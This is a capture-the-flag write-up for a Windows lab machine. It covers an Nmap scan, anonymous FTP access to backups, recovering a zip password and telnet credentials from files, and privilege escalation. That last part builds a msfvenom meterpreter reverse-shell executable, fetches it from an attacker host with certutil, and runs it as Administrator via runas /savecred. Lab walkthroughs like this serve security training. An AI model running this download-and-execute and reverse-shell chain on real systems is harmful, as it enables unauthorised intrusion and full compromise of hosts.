Anonymous login to a FTP server allowed access to backups files. From the backups, a password for a protected zip could be found. The archive contained emails which contained credentials to connect to telnet allowing a user level shell.
runas could then be used to execute a reverse shell as the Administrator because the account had saved credentials.
As ever lets throw
Nmap at it and see what it reveals.
# Nmap 7.70 scan initiated Sat Sep 29 15:00:27 2018 as: nmap -sV -sS -sC -o nmap-initial.txt 10.10.10.98 Nmap scan report for 10.10.10.98 Host is up (0.074s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet? 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: MegaCorp |_tomcat-scan: /manager/html is HTTP 404. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Sep 29 15:03:57 2018 -- 1 IP address (1 host up) scanned in 210.29 seconds
This scan reveals 3 open ports:
- 21/tcp - A FTP server - The default scripts have determined that anonymous login is allowed this means that there are likely to be files we can access.
- 23/tcp - Telnet - Telnet wants a username and password for authentication that we don't have yet.
- 80/tcp - HTTP - At a glance there is nothing useful here
Nmap determined that the FTP server allowed anonymous logins. This means that after we connect to the server with
ftp 10.10.10.98 we can login with the default credentials of
anonymous and a blank password.
Connected to 10.10.10.98. 220 Microsoft FTP Service Name (10.10.10.98:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM <DIR> Backups 08-24-18 09:00PM <DIR> Engineer 226 Transfer complete.
We are greeted by two directories the first
Backups contains a file named
backup.mdb and the second
Engineer contains a file named
Access Control.zip we can download them with
ftp> cd Backups 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM 5652480 backup.mdb 226 Transfer complete. ftp> get backup.mdb local: backup.mdb remote: backup.mdb 200 PORT command successful. 125 Data connection already open; Transfer starting. WARNING! 28296 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. 5652480 bytes received in 3.23 secs (1.6692 MB/s) ftp> cd .. 250 CWD command successful. ftp> cd Engineer 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-24-18 12:16AM 10870 Access Control.zip 226 Transfer complete. ftp> get Access Control.zip local: Control.zip remote: Access 200 PORT command successful. 550 The system cannot find the file specified. ftp> get "Access Control.zip" local: Access Control.zip remote: Access Control.zip 200 PORT command successful. 125 Data connection already open; Transfer starting. WARNING! 45 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. 10870 bytes received in 0.13 secs (80.7015 kB/s)
We now have two files from the FTP server. The first appears to be a Microsoft Access Database and the second a password protected zip.
backup.mdb we are presented with the ascii text from the file. Running simply
strings backup.mdb produces too much noise so setting the
-n option refines the search to remove noise. Running
strings -n 10 backup.mdb is a sufficient filter and some potential passwords can be seen. Likely to be for the zip file.
JMOLqQikYdb MWQM\YbMd^di MWQM\domMd^di OLqQikYdbJMMQkk `YbkbdLiQJ\Yb `YbkbdLiQJ\dom `Ybkbd^QJqQ `YbkbdmdqQimY`Q `Ybksdi\OJv bdLiQJ\dom domdqQimY`Q administrator; Administrator< 4555555555555Q ppermission backup_admin [email protected] <--- Looks Suspicious to me
[email protected] is in fact the password for the zip. However, you'll find that it can't be extracted using
unzip with it citing
unsupported compression method 99. If you look up
compression method 99 you'll find that it uses AES encryption which isn't currently supported by the
unzip binary. Luckily, the system archive manager (in Gnome at least) can be used as an alternative.
Within the zip is a .pst file using file to determine its type yields.
Access Control.pst: Microsoft Outlook email folder (>=2003)
When I first did this box, I'll be honest i just found an online converter to view the file and while its not the best practice in the heat of the moment while the blood was still very much up for grabs it worked.
However, you could say the proper way of doing this was with the
readpst -o ./ Access\ Control.pst Opening PST file and indexes... Processing Folder "Deleted Items" "Access Control" - 2 items done, 0 items skipped.
The email can then clearly be seen in the
2.eml file it will create.
Hi there, The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. Regards, John
Either way once the email is extracted we obtain the username
security and a password
4Cc3ssC0ntr0ller. This will likely be for telnet.
telnet 10.10.10.98 it is seen that is in fact the case as these credentials are accepted. Once connected you can navigate to the
user.txt flag and print it with
Trying 10.10.10.98... Connected to 10.10.10.98. Escape character is '^]'. Welcome to Microsoft Telnet Service login: security password: *=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\security>cd Desktop C:\Users\security\Desktop>type user.txt
msfconsole and load the exploit listener with
use exploit/multi/handler. Next set the payload as
windows/meterpreter/reverse_tcp and populate the options as required for your needs and start the listener with
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 10.13.37.10 lhost => 10.13.37.10 msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.13.37.10 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > run [*] Started reverse TCP handler on 10.13.37.10:4444
Next we need to generate a payload to do this we will use:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.37.10 LPORT=4444 -f exe > shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes
Now we need to host this file so that we can access it, to do this we will use python's
python -m SimpleHTTPServer 80
Then to download the shell we can make use of
certutil (this may not work on all versions of Windows) as we are using
certutil we have to host the web server on port 80 instead of the default 8000.
certutil.exe -urlcache -split -f http://10.10.MY.IP/shell.exe shell.exe
Finally we run
runas /savecred /user:ACCESS\Administrator shell.exe to execute the shell as the administrator. This can be done because the account has saved credentials.
C:\Users\security\Desktop>cd C:\temp C:\temp>certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe **** Online **** 000000 ... 01204a CertUtil: -URLCache command completed successfully. C:\temp>runas /savecred /user:ACCESS\Administrator shell.exe C:\temp>
If you look at the
msfconsole you should now have a privileged shell waiting for you that can be used to read
[*] Started reverse TCP handler on 10.10.13.37:4444 [*] Sending stage (179779 bytes) to 10.10.10.98 [*] Meterpreter session 1 opened (10.10.13.37:4444 -> 10.10.10.98:49200) meterpreter > shell Process 3428 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd c:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop> type root.txt